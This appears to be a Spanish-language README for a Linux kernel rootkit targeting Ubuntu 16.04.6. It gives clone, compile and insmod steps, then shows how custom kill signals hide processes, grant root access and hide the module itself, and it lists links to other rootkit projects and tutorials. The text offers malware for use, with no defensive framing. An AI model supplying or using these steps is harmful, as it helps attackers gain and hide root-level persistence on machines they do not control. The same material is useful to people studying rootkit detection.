
Un rootkit para ubuntu-16.04.6 (Linux 4.4). Puede ocultar un proceso, otorgar acceso root y ocultarse a sí mismo.
Este es un rootkit que fue probado en ubuntu-16.04.6-desktop-amd64 (Linux 4.4), pero debería ser fácil portarlo a diferentes versiones del kernel.
Enlace al video --> https://drive.google.com/file/d/1yDktAg9vIPBH3OPEBYset9OdQb0LMevA/view?usp=sharing
Clonar el repositorio
git clone https://github.com/Asekon/RootKit
Entrar en la carpeta
cd RootKit
Compilar
sudo make
Insertar el módulo en el kernel como root
sudo insmod RootKit.ko
(Ocultar)Mostrar un proceso (ejemplo: PID 500)
kill -0 500
Obtener acceso root (puedes insertar cualquier PID, no tiene que ser 0)
kill -1 0
(Ocultar)Mostrar el Rootkit (puedes insertar cualquier PID, no tiene que ser 0)
kill -2 0
Eliminar el módulo del kernel como root (asegúrate primero de que sea visible en la lista de módulos)
sudo rmmod RootKit
https://en.wikipedia.org/wiki/Rootkit
http://dandylife.net/blog/archives/304
https://github.com/nurupo/rootkit
https://github.com/f0rb1dd3n/Reptile
https://github.com/m0nad/Diamorphine
http://derekmolloy.ie/writing-a-linux-kernel-module-part-1-introduction/
http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html
https://yassine.tioual.com/index.php/2017/01/10/hiding-processes-for-fun-and-profit/